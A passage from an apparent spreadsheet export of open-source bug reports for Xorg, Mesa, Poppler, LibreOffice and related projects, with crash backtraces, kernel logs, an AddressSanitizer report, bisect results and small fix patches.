4: /usr/bin/X [0x8181800]
5: /usr/bin/X(ProcPutImage+0x159) [0x808a4c9]
6: /usr/bin/X(Dispatch+0x35f) [0x808d1af]
7: /usr/bin/X(main+0x395) [0x8072515]
8: /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6) [0x291b56]
9: /usr/bin/X [0x80719c1]
Saw signal 7.  Server aborting.
In dmesg :
[ 1751.949925] [drm:i915_gem_object_bind_to_gtt] *ERROR* Invalid object alignment requested 4096
My karmic &amp; PPA are up-to-date. (so are X and Linux Kernel)
Attaching as much data as possible</t>
  </si>
  <si>
    <t>XORG-67161</t>
  </si>
  <si>
    <t>Blank video after resuming from S3 or S4</t>
  </si>
  <si>
    <t>I have a Creative Labs Graphics Blaster Riva TNT video card (nv0). I'm using nouveau.noaccel=1 kernel boot parameter to workaround bug 27211. I'm on a derivative of Debian Sid:
Linux openmediavault 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
The problem is this: when the system wakes up after a pm-suspend or pm-hibernate the system resumes fine (I can ssh to it and everything works ok) but the screen stays blank (the monitor has the orange led which is used when it's in standy-by mode or no signal received).
In /var/log/messages I find the following messages which seem to be related to nouveau:
Jul 22 12:01:54 openmediavault kernel: [   58.165951] [drm] nouveau 0000:01:00.0: We're back enabling device...
Jul 22 12:01:54 openmediavault kernel: [   58.165958] [drm] nouveau 0000:01:00.0: POSTing device...
Jul 22 12:01:54 openmediavault kernel: [   58.232063] agpgart-intel 0000:00:00.0: AGP 2.0 bridge
Jul 22 12:01:54 openmediavault kernel: [   58.232092] agpgart-intel 0000:00:00.0: putting AGP V2 device into 2x mode
Jul 22 12:01:54 openmediavault kernel: [   58.232121] nouveau 0000:01:00.0: putting AGP V2 device into 2x mode
Jul 22 12:01:54 openmediavault kernel: [   58.232147] [drm] nouveau 0000:01:00.0: Reinitialising engines...
Jul 22 12:01:54 openmediavault kernel: [   58.232169] [drm] nouveau 0000:01:00.0: Restoring GPU objects...
Jul 22 12:01:54 openmediavault kernel: [   58.241771] [drm] nouveau 0000:01:00.0: Restoring mode...
Jul 22 12:01:54 openmediavault kernel: [   58.310342] [drm] nouveau 0000:01:00.0: Setting dpms mode 3 on vga encoder (output 0)
[...]
Jul 22 12:01:54 openmediavault kernel: [   58.398120] [drm] nouveau 0000:01:00.0: Setting dpms mode 0 on vga encoder (output 0)
Jul 22 12:01:54 openmediavault kernel: [   58.398130] [drm] nouveau 0000:01:00.0: Output VGA-1 is running on CRTC 0 using output @
[...]
Jul 22 12:35:22 openmediavault kernel: [ 2071.968039] [drm] nouveau 0000:01:00.0: Setting dpms mode 1 on vga encoder (output 0)
Please let me know if you need the full contents or /var/log/messages or any other info that could be used to understand what the problem is.</t>
  </si>
  <si>
    <t>mauromol</t>
  </si>
  <si>
    <t>MESA-108112</t>
  </si>
  <si>
    <t>[vulkancts] some of the coherent memory tests fail.</t>
  </si>
  <si>
    <t>As per the latest VK-GL-CTS commit (57d5e6cdd5365b92a3959e11ee4c7ab889e48cd0) several new failing coherent memory tests were added.
Setting the GLC bit on all SSBO loads &amp; stores fixed the tests so the action item is to get nir to provide it.
Failing tests on Vega:
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_nonlocal.buffer.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_nonlocal.image.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_nonlocal.image.fragFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_local.buffer.compFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_local.buffer.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_local.image.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_nonlocal.buffer.guard_local.image.fragFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_nonlocal.buffer.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_nonlocal.image.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_nonlocal.image.fragFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_local.buffer.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_local.buffer.fragFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_local.image.vertFail
dEQP-VK.memory_model.message_passing.core11.u32.coherent.fence_fence.atomicwrite.device.payload_local.buffer.guard_local.image.fragFail</t>
  </si>
  <si>
    <t>TANGO-10883</t>
  </si>
  <si>
    <t>audio-x-generic 22x22 looks like blurry</t>
  </si>
  <si>
    <t>the icon audio-x-generic in size 22x22 seems to be blurry you can see it at http://tango.freedesktop.org/Tango_Icon_Gallery. this is also visible in the SVN trunk version of rhythmbox which use this icon.</t>
  </si>
  <si>
    <t>XORG-18178</t>
  </si>
  <si>
    <t>Middle button emulation issues</t>
  </si>
  <si>
    <t>I am unable to drag windows with compiz (either by clicking on the title bar or holding Alt and clicking anywhere then dragging) unless I set the Evdev Middle Button Emulation property to 0. Pressing the actual middle mouse button doesn't help either only setting the property to 0.
On a sidenote it seems impossible to set the property to 0 by default using Option Emulate3Buttons due to using xf86FindOption() (which returns TRUE if the option is present regardless of its value) instead of something like xf86GetOptValBool().</t>
  </si>
  <si>
    <t>DRI-88911</t>
  </si>
  <si>
    <t>[ILK]igt/drv_suspend/sysfs-reader cause dmesg warn.</t>
  </si>
  <si>
    <t>Created attachment 113037
dmesg for case igt/drv_suspend/sysfs-reader
==System Environment==
--------------------------
Regression: yes
Non-working platforms:  ILK
==kernel==
--------------------------
drm-intel-nightly/8b4216f91c7bf8d3459cadf9480116220bd6545e(2015-02-02)
==Bug detailed description==
-----------------------------
check dmesg after run this case.
dmesg -r|egrep |grep drm
[    1.415809] WARNING: CPU: 3 PID: 1219 at drivers/gpu/drm/i915/intel_uncore.c:169 intel_uncore_forcewake_reset+0x18b/0x27e [i915]()
[    1.416176]  i915(+) button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[    1.416178] CPU: 3 PID: 1219 Comm: udevd Not tainted 3.19.0-rc6_drm-intel-nightly_8b4216_20150202+ #126
[    1.416338]  [] ? drm_dev_register+0x74/0xe6 [drm]
[    1.416344]  [] ? drm_get_pci_dev+0xf7/0x1b2 [drm]
[  100.666822] WARNING: CPU: 2 PID: 3798 at drivers/gpu/drm/i915/intel_uncore.c:169 intel_uncore_forcewake_reset+0x18b/0x27e [i915]()
[  100.666838] Modules linked in: ip6table_filter ip6_tables ebtable_nat ebtables nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_REJECT nf_reject_ipv4 iptable_mangle xt_tcpudp iptable_filter ip_tables x_tables bridge stp llc ipv6 dm_mod snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic iTCO_wdt iTCO_vendor_support ppdev dcdbas serio_raw pcspkr i2c_i801 snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm wmi snd_timer lpc_ich mfd_core snd soundcore parport_pc parport tpm_tis tpm acpi_cpufreq i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[  100.666841] CPU: 2 PID: 3798 Comm: kworker/u16:13 Tainted: G        W      3.19.0-rc6_drm-intel-nightly_8b4216_20150202+ #126
[  100.666885]  [] ? i915_drm_suspend+0x17d/0x1b3 [i915]
[  101.073540] WARNING: CPU: 1 PID: 3826 at drivers/gpu/drm/i915/intel_uncore.c:169 intel_uncore_forcewake_reset+0x18b/0x27e [i915]()
[  101.073557] Modules linked in: ip6table_filter ip6_tables ebtable_nat ebtables nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_REJECT nf_reject_ipv4 iptable_mangle xt_tcpudp iptable_filter ip_tables x_tables bridge stp llc ipv6 dm_mod snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic iTCO_wdt iTCO_vendor_support ppdev dcdbas serio_raw pcspkr i2c_i801 snd_hda_intel snd_hda_controller snd_hda_codec snd_hwdep snd_pcm wmi snd_timer lpc_ich mfd_core snd soundcore parport_pc parport tpm_tis tpm acpi_cpufreq i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[  101.073560] CPU: 1 PID: 3826 Comm: kworker/u16:41 Tainted: G        W      3.19.0-rc6_drm-intel-nightly_8b4216_20150202+ #126
[  101.073606]  [] ? i915_drm_resume_early+0x94/0x94 [i915]
[  101.073623]  [] ? i915_drm_resume_early+0x5d/0x94 [i915]
the following cases have the similar dmesg and bisect result were the same.
igt/drv_suspend/sysfs-reader 
igt/drv_suspend/forcewake 
igt/drv_suspend/fence-restore-untiled 
igt/drv_suspend/fence-restore-tiled2untiled 
igt/drv_suspend/debugfs-reader 
==Reproduce steps==
---------------------------- 
1. ./drv_suspend --run-subtest sysfs-reader</t>
  </si>
  <si>
    <t>WAYLAND-103965</t>
  </si>
  <si>
    <t>Three-Finger to middle click</t>
  </si>
  <si>
    <t>Hi Libinput Team
I'm begging you guys please add a method to disable the three finger tap middle klick option if having tap ro click enabled. I'm using a L450 thing pad and the touchpad is absolutely unusable with tap to klick enabled but if disabled I'm losing elementary features. While scrolling it happens alway that I past in via three finger tap. It destroyed already a lot of coding work. I always have to disable while coding and browsing(opens 40+ tabs while scrolling sometimes) tap to click but I need it simultaneously. Please just let me disable three finger to middle because my thinkpad has a hardware middle but so I don't need it anyways.</t>
  </si>
  <si>
    <t>nepomukderdrache</t>
  </si>
  <si>
    <t>DRI-48422</t>
  </si>
  <si>
    <t>Radeon KMS fails on Radeon X850XT (R480) graphics card</t>
  </si>
  <si>
    <t>Created attachment 59628
Dmesg output from boot
Video output fails completely (apparently due to a KMS regression) on all kernels &gt;= 3.2 rendering the system unusable as a desktop. Access via SSH over network is unaffected.
Steps to reproduce: Boot any recent kernel. This has been encountered with Debian and the kernel versions in question are:-
linux-image-3.0.0-2-amd64         3.0.0-5               functions as expected
linux-image-3.2.0-1-amd64         3.2.7-1               fails
linux-image-3.2.0-2-amd64         3.2.13-1              fails
linux-image-3.3.0-trunk-amd64     3.3-1~experimental.1  fails
Expected behaviour:-
At system boot initial kernel output appears on the VGA console until the drm driver is loaded when the kernel switches the output font and resolution. Boot continues until a subsequent switch (I believe when the kernel attempts to modeswitch the card) at which point the font visibly changes at this point and boot continues with further console output until the X desktop appears.
Actual behaviour with failing kernels:-
Boot starts normally until the modeswitch happens at which point video output ceases and the monitor shows no signal on the DVI input.
Graphics hardware details from lspci is:-
01:00.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI R480 [Radeon X850XT (PCIE)] (Primary)
01:00.1 Display controller: Advanced Micro Devices [AMD] nee ATI R480 [Radeon X850XT (PCIE)] (Secondary)
Attached file is dmesg output from booting the 3.3 kernel with drm.debug=0x6 passed as a kernel parameter.</t>
  </si>
  <si>
    <t>TELEPATHY-28123</t>
  </si>
  <si>
    <t>sofiasip and sip.halonet.pl = available status but I cannot call to any phone/mobile.</t>
  </si>
  <si>
    <t>Created attachment 35675
sofia.log
Empathy 2.30.1 telepathy-sofiasip 0.6.2-1 @ Ubuntu 10.04 64bit.
Hello
I've been connected (available status) to my SIP provider (@sip.halonet.pl) but I cannot:
* add any new contact to roster (I have info that sofiasip not work with Empathy roster it's true?).
* establish connection with any number what I dial.
I use empathy-debugger to save logs from empathy and sofia - I attach this logs.</t>
  </si>
  <si>
    <t>przysowa</t>
  </si>
  <si>
    <t>DRI-31124</t>
  </si>
  <si>
    <t>[SNB] compiz stretch event causes X crash</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Libdrm:         (master)2.4.22-4-gc5286f4a871e054b63dee8a60a6f06574c4ca1b8
Mesa:           (master)8449a4772a73f613d9425b691cffba6a261df813
Xserver:               
(master)xorg-server-1.9.0-178-g1a0d9324b3d9fd93e685066e0e5cea0611878c0d
Xf86_video_intel:              
(master)2.12.902-24-gb066ddda31e40afa652ae51ffc35025ac3ef6f2a
Cairo:          (master)6dc0b19adb6da690ad5944623081b9cdb42de066
Libva:          (master)6c372035373e531d2bb5608861adab3f6b2ff471
Kernel: 2.6.36-rc7
Bug detailed description:
-------------------------
Enable compiz and then run a windows application such as glxgear. Drag the window triggering the stretch effect repeatedly. Then the X can crash.
The X's backtrace when it crash is as following:
Backtrace:
0: X (xorg_backtrace+0x3b) [0x809a78b]
1: X (0x8048000+0x5dc05) [0x80a5c05]
2: (vdso) (__kernel_rt_sigreturn+0x0) [0xb77cb40c]
3: X (FreeClientResources+0xed) [0x806fbbd]
4: X (CloseDownClient+0x69) [0x806e3a9]
5: X (0x8048000+0x26a2e) [0x806ea2e]
6: X (0x8048000+0x1a22a) [0x806222a]
7: /lib/libc.so.6 (__libc_start_main+0xe6) [0x8e2cc6]
8: X (0x8048000+0x19e01) [0x8061e01]
Segmentation fault at address 0xb5af500c
Bug reproduce steps:
-------------------------
1 enable compiz
2 run glxgear
3 drag the window</t>
  </si>
  <si>
    <t>POPPLER-23030</t>
  </si>
  <si>
    <t>patch to disable font substitution in pdftops</t>
  </si>
  <si>
    <t>I have a large number of small PDF files to convert to eps.  The system that generated the PDF files is out of my control.  To save space PDF files do not contain any embedded fonts.  Instead I have the postscript fonts on my system.  When pdftops finds a reference to a non-embedded font it changes the font to Helvetica Times-Roman or Courier from a list in psSubstFonts[] in PSOutputDev.cc.  My patches add a -nosubst flag to pdftops that tells PSOutputDev::setupFont() to pass the original font in the postscript output instead of substituting it.  This way pdftops does not lose any information and the postscript file will still view or print correctly if you have the postscript font available.</t>
  </si>
  <si>
    <t>FONTCONFIG-45</t>
  </si>
  <si>
    <t>configure options are documented incorrectly</t>
  </si>
  <si>
    <t>The configure options (e.g. --with-default-fonts) is documented incorrectly. 
configure --help says to use --with-default-fonts but the actual option is
--with-default_fonts.  However even if you specify the correct option there is
a bug in the default_fonts variable.  The attached patch corrects all options
such that they use the documented options and also corrects the typo when
specifying an alternate default font directory.
Without these patches fontconfig will not work out-of-the-box on FreeBSD.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-105166</t>
  </si>
  <si>
    <t>account request for drm-misc</t>
  </si>
  <si>
    <t>Created attachment 137445
SSH public key
I am requesting an account for commit access to drm-misc.
real name: David Lechner
email address: david@lechnology.com
preferred account name: dlech
For reference: https://lists.freedesktop.org/archives/dri-devel/2018-January/162001.html</t>
  </si>
  <si>
    <t>XORG-2194</t>
  </si>
  <si>
    <t>XScreenSaverSetAttributes broken on 64 bit architectures</t>
  </si>
  <si>
    <t>Lauching beforelight on OpenBSD/amd64 or OpenBSD/amd64 lead to a BadColor error:
X Error of failed request:  BadColor (invalid Colormap parameter)
  Major opcode of failed request:  136 (MIT-SCREEN-SAVER)
  Minor opcode of failed request:  3 ()
  Resource id in failed request:  0x2b000001
  Serial number of failed request:  94
  Current serial number in output stream:  95
Afaict this is caused by a mismatch in the length of the fields used to decode
the request in Xext/saver.c. The attached patch is a proposed fix but I'm not 
sure if it's correct. It would be great if someone more familiar then me with
the request decoding code checked that before I commit it.</t>
  </si>
  <si>
    <t>XORG-51477</t>
  </si>
  <si>
    <t>[NV10 NV20] bad/missing graphics usually alpha-related</t>
  </si>
  <si>
    <t>Created attachment 63512
kernel log
Using recent nouveau versions Iâ€™m encountering missing graphics in various programs (e.g. gtkâ€™s filechooser LibreOffice Iceape Pidgin xfce4-panelâ€™s pager and on lightdmâ€™s gtk-greeter).
Moving the mouse cursor over these places or resizing the windows makes the icons appear sometimes (but also disappear in the same manner).
Tested broken (Debian package) versions are:
0.0.16+git20120529+ace77b6-1
0.0.16+git20120614+36d3f8c-1
1.0.1-1
0.0.16+git20120322+ab7291d-1 was (and still is) working fine.
Kernel version is 3.4.4
libdrm 2.4.33</t>
  </si>
  <si>
    <t>gerrit.keller</t>
  </si>
  <si>
    <t>HAL-16335</t>
  </si>
  <si>
    <t>Add zoom and ThinkPad events to acpi addon for IBM</t>
  </si>
  <si>
    <t>Created attachment 17101
Add zoom and ThinkPad events to acpi addon for IBM
As of kernel 2.6.25 there are acpi events generated for the Fn+Space button combination and for the ThinkPad (a.k.a. Access IBM and ThinkVantage) button both on IBM/LENOVO ThinkPads.
I'll attach a patch (git log -p format) that adds zoom and ThinkPad button events to the acpi addon for IBM/LENOVO ThinkPads. The names I chose for these events are just some (safe) guesses.
This patch fixes a trivial typo too (Fn=Insert).
With this patch both events show up in dbus-monitor --system. If only I knew how to do something actually useful with these dbus messages I see scrolling by ...</t>
  </si>
  <si>
    <t>pebolle</t>
  </si>
  <si>
    <t>XORG-7364</t>
  </si>
  <si>
    <t>'RenderBadGlyphSet (invalid GlyphSet parameter)' error on PPC64 with gtk applications</t>
  </si>
  <si>
    <t>Hello
on PPC64 (most?) gtk applications crash on startup with the following error 
(for example the news reader pan):
The program 'pan' received an X Window System error. 
This probably reflects a bug in the program. 
The error was 'RenderBadGlyphSet (invalid GlyphSet parameter)'. 
  (Details: serial 2041 error_code 182 request_code 154 minor_code 23) 
  (Note to programmers: normally X errors are reported asynchronously 
   that is you will receive the error a while after causing it. 
   To debug your program run it with the --sync command line 
   option to change this behavior. You can then get a meaningful 
   backtrace from your debugger if you break on the gdk_x_error() function.) 
this would be a workaround:
##############################################################################
diff -Nur xorg-server-1.1.0.orig/render/render.c 
xorg-server-1.1.0/render/render.c
--- xorg-server-1.1.0.orig/render/render.c	2005-08-29 04:47:39.000000000 
+0900
+++ xorg-server-1.1.0/render/render.c	2006-04-29 18:11:54.596137060 +0900
@@ -13407 +13407 @@
 	{
 	    if (buffer + sizeof (GlyphSet) &lt; end)
 	    {
-                memcpy(
+                gs = *(CARD32 *) buffer
 		glyphSet = (GlyphSetPtr) SecurityLookupIDByType (client
 								 gs
 								 GlyphSetType
##############################################################################
[quote from http://bugs.gentoo.org/show_bug.cgi?id=112355 comment #14]
Michel DÃ¤nzer pointed out that 'typedef unsigned long GlyphSet' isn't the same
size on 32/64 bit architectures so either the Render protocol or server code
isn't 32/64 clean.
[\quote]
This only happens with gtk applications. I've never seen this with an qt 
application or something else.</t>
  </si>
  <si>
    <t>o590694</t>
  </si>
  <si>
    <t>XORG-97765</t>
  </si>
  <si>
    <t>REGRESSION: Buffer overrun on launch in SmartScheduleClient</t>
  </si>
  <si>
    <t>master 527c6baa294d17c5eca1d87ac941844872e90dac (technically dd85834e3995671da908e825eaa7a228d11f0b3d which is in the pull queue to address macOS build failures).
Built with ASan X11 crashes on launch.  I haven't tried master for a while so I'm not quite sure when this regressed.
ASan report is:
Application Specific Information:
X.Org X Server 1.18.99.1 Build Date: 20160910
=================================================================
==16921==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000108ce3834 at pc 0x000108880766 bp 0x7000045f76c0 sp 0x7000045f76b8
READ of size 4 at 0x000108ce3834 thread T6
    #0 0x108880765 in SmartScheduleClient dispatch.c:365
    #1 0x10887ecc5 in Dispatch dispatch.c:422
    #2 0x1088c05f1 in dix_main main.c:301
    #3 0x1082aabba in server_thread quartzStartup.c:66
    #4 0x7fffc5f16aaa in _pthread_body (libsystem_pthread.dylib+0x3aaa)
    #5 0x7fffc5f169f6 in _pthread_start (libsystem_pthread.dylib+0x39f6)
    #6 0x7fffc5f161fc in thread_start (libsystem_pthread.dylib+0x31fc)
0x000108ce3834 is located 12 bytes to the left of global variable 'nClients' defined in 'dispatch.c:164:12' (0x108ce3840) of size 4
0x000108ce3834 is located 48 bytes to the right of global variable 'nextFreeClientID' defined in 'dispatch.c:162:12' (0x108ce3800) of size 4
SUMMARY: AddressSanitizer: global-buffer-overflow dispatch.c:365 in SmartScheduleClient
Shadow bytes around the buggy address:
  0x10002119c6b0: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x10002119c6c0: 00 00 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x10002119c6d0: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x10002119c6e0: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x10002119c6f0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9
=&gt;0x10002119c700: 04 f9 f9 f9 f9 f9[f9]f9 04 f9 f9 f9 f9 f9 f9 f9
  0x10002119c710: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x10002119c720: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x10002119c730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10002119c740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10002119c750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
Thread T6 created by T0 here:
    #0 0x1091c83e9 in wrap_pthread_create (libclang_rt.asan_osx_dynamic.dylib+0x413e9)
    #1 0x1082aa941 in create_thread quartzStartup.c:78
    #2 0x1082aa79c in QuartzInitServer quartzStartup.c:95
    #3 0x10827f26a in X11ApplicationMain X11Application.m:1286
    #4 0x108290590 in X11ControllerMain X11Controller.m:984
    #5 0x1082aaf95 in server_main quartzStartup.c:127
    #6 0x10825512b in do_start_x11_server bundle-main.c:436
    #7 0x108258854 in _Xstart_x11_server mach_startupServer.c:189
    #8 0x108259bb6 in mach_startup_server mach_startupServer.c:399
    #9 0x7fffc5e26186 in mach_msg_server (libsystem_kernel.dylib+0x12186)
    #10 0x108255848 in main bundle-main.c:774
    #11 0x7fffc5cff254 in start (libdyld.dylib+0x5254)</t>
  </si>
  <si>
    <t>LIBREOFFICE-47636</t>
  </si>
  <si>
    <t>Extremely slow display with font fallback</t>
  </si>
  <si>
    <t>Created attachment 58800
Document containing the same bulleted list element pasted a several time that is pretty slow to scroll into
Hi ! 
Here's an issue that arose with LibreOffice 3.5.0 and is still in Libo 3.5.1. It's 100% reproducible under Arch Linux or Ubuntu 12.04 beta / daily.
A document I used to work on under Libo 3.4.x is now extremely slow to scroll. I figured out that the behaviour could be obtained when copying / pasting one bulleted list element to a blank file.
When pasting this bulleted list element a couple of times onto a page and trying to scroll display is very slow. I attached a test case (not the whole original file) but the latter is even slower but contains some personal pieces of information. I can send it privately if needed.
Test configuration : Core2Duo 3 GHz Nvidia 9800 + prioprietary drivers. Issues occurs also with the Nouveau driver.
Thanks again to everyone involved best regards
Mahen</t>
  </si>
  <si>
    <t>mahen</t>
  </si>
  <si>
    <t>POPPLER-8415</t>
  </si>
  <si>
    <t>FONTCONFIG_CFLAGS not injected</t>
  </si>
  <si>
    <t>While trying to build poppler-0.5.4 I discovered several failures because
'fontcofig/fontconfig.h' was not found.
Example:
------------------------------------------------------------------------------
In file included from pdffonts.cc:19:
../poppler/GlobalParams.h:18:35: error: fontconfig/fontconfig.h: No such file or
directory
../poppler/GlobalParams.h:323: error: ISO C++ forbids declaration of 'FcConfig'
with no type
../poppler/GlobalParams.h:323: error: expected '' before '*' token
------------------------------------------------------------------------------
I fixed that through appending $(FONTCONFIG_CFLAGS) to the INCLUDES variable of
several Makefile.in files.</t>
  </si>
  <si>
    <t>morfoh</t>
  </si>
  <si>
    <t>LIBREOFFICE-45724</t>
  </si>
  <si>
    <t>FILESAVE FORMATTING Text field data loss</t>
  </si>
  <si>
    <t>Created attachment 56694
.odt file with test field sample.
Data is not retained within a text box when an odt file is saved as a .doc or .docx
I created a file under .odt but once i have finished with the document and filled out my text fields i need to save it as a .doc as sending it to people who only have MS Office.
When opening the file with MS Office (Office 2000 and 2007) the data that was in the text field has disappeared. Trying to open the .doc file in LibreOffice also shows the file missing data. Opening the original .odt file in LibreOffice the data can be seen.
To recreate document:
1/ Select Form Control Toolbar  (View â†’ Toolbars â†’ Form Controls)
2/ Turn On Design Mode (icon on Form Control toolbar)
3/ Draw a â€œText Boxâ€
4/ Turn Off Design Mode
5/ Enter text data into text box
6/ Save document as a .doc file.
7/ Open MS format ver in LibreOffice OR MS Office â€“ data (and most formatting) lost!
Sample documents attached.</t>
  </si>
  <si>
    <t>fornar</t>
  </si>
  <si>
    <t>TELEPATHY-24853</t>
  </si>
  <si>
    <t>Implement ChatState interface support</t>
  </si>
  <si>
    <t>Implement ChatState interface support. 
This branch depends on text-chan-refact branch a small refactoring on text-chan so some methods could be reused to implement chat state support.</t>
  </si>
  <si>
    <t>MESA-106399</t>
  </si>
  <si>
    <t>[bisected] sddm-greeter: segfault in radeonsi_dri.so on dpms resume</t>
  </si>
  <si>
    <t>Since mesa 18.0 sddm-greeter segfaults on dpms resume.
Log entry:
sddm-greeter[23411]: segfault at 34 ip 00007f90d2588c9d sp 00007ffd045c0260 error 4 in radeonsi_dri.so[7f90d2184000+80e000]
bisect points at:
3160cb86aa9234ff78e11fe7a00f30bfb5cb8445 is the first bad commit
commit 3160cb86aa9234ff78e11fe7a00f30bfb5cb8445
Author: Louis-Francis RattÃ©-Boulianne 
Date:   Fri Oct 6 01:26:51 2017 -0400
    egl/x11: Re-allocate buffers if format is suboptimal
    If PresentCompleteNotify event says the pixmap was presented
    with mode PresentCompleteModeSuboptimalCopy it means the pixmap
    could possibly have been flipped instead if allocated with a
    different format/modifier.
    Signed-off-by: Louis-Francis RattÃ©-Boulianne 
    Reviewed-by: Daniel Stone 
:040000 040000 938aabed7e3e5a41fd0e3167a6afdceac69a37fd 781dc1b092a4bac23a150a40c3b51c4e64bf7238 M      src
gdb output:
Thread 1 sddm-greeter received signal SIGSEGV Segmentation fault.
pipe_reference_described (get_desc= reference=0x7f336805396c ptr=0x0) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/auxiliary/util/u_inlines.h:83
83      /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/auxiliary/util/u_inlines.h: Datei oder Verzeichnis nicht gefunden.
(gdb) bt
#0  pipe_reference_described (get_desc= reference=0x7f336805396c ptr=0x0) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/auxiliary/util/u_inlines.h:83
#1  pipe_resource_reference (tex=0x7f336805396c ptr=0x556bf8cdcda0) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/auxiliary/util/u_inlines.h:138
#2  dri2_allocate_textures (ctx=0x556bf8b101e0 drawable=0x556bf8cdcc80 statts= statts_count=2) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/state_trackers/dri/dri2.c:762
#3  0x00007f337dd550fd in dri_st_framebuffer_validate (stctx= stfbi= statts=0x556bf8cdd2d0 count=2 out=0x7ffc7491d250) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/gallium/state_trackers/dri/dri_drawable.c:85
#4  0x00007f337db96a91 in st_framebuffer_validate (stfb=stfb@entry=0x556bf8cdcea0 st=st@entry=0x556bf8cd5330) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/mesa/state_tracker/st_manager.c:201
#5  0x00007f337db9842b in st_manager_validate_framebuffers (st=0x556bf8cd5330) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/mesa/state_tracker/st_manager.c:1117
#6  0x00007f337db53fe5 in st_validate_state (st=st@entry=0x556bf8cd5330 pipeline=pipeline@entry=ST_PIPELINE_CLEAR) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/mesa/state_tracker/st_atom.c:203
#7  0x00007f337db5c10f in st_Clear (ctx=0x556bf8cacab0 mask=50) at /var/tmp/portage/media-libs/mesa-9999/work/mesa-9999/src/mesa/state_tracker/st_cb_clear.c:379
#8  0x00007f338d953c4b in QSGBatchRenderer::Renderer::renderBatches (this=this@entry=0x556bf8423ea0) at scenegraph/coreapi/qsgbatchrenderer.cpp:2539
#9  0x00007f338d95968a in QSGBatchRenderer::Renderer::render (this=) at scenegraph/coreapi/qsgbatchrenderer.cpp:2763
#10 0x00007f338d949ab0 in QSGRenderer::renderScene (this=0x556bf8423ea0 bindable=...) at scenegraph/coreapi/qsgrenderer.cpp:244
#11 0x00007f338d949f4b in QSGRenderer::renderScene (this= fboId=) at scenegraph/coreapi/qsgrenderer.cpp:197
#12 0x00007f338d9855b0 in QSGDefaultRenderContext::renderNextFrame (this=0x556bf8437500 renderer=0x556bf8423ea0 fboId=) at scenegraph/qsgdefaultrendercontext.cpp:180
#13 0x00007f338d9ed52f in QQuickWindowPrivate::renderSceneGraph (this=this@entry=0x556bf824e3b0 size=...) at items/qquickwindow.cpp:481
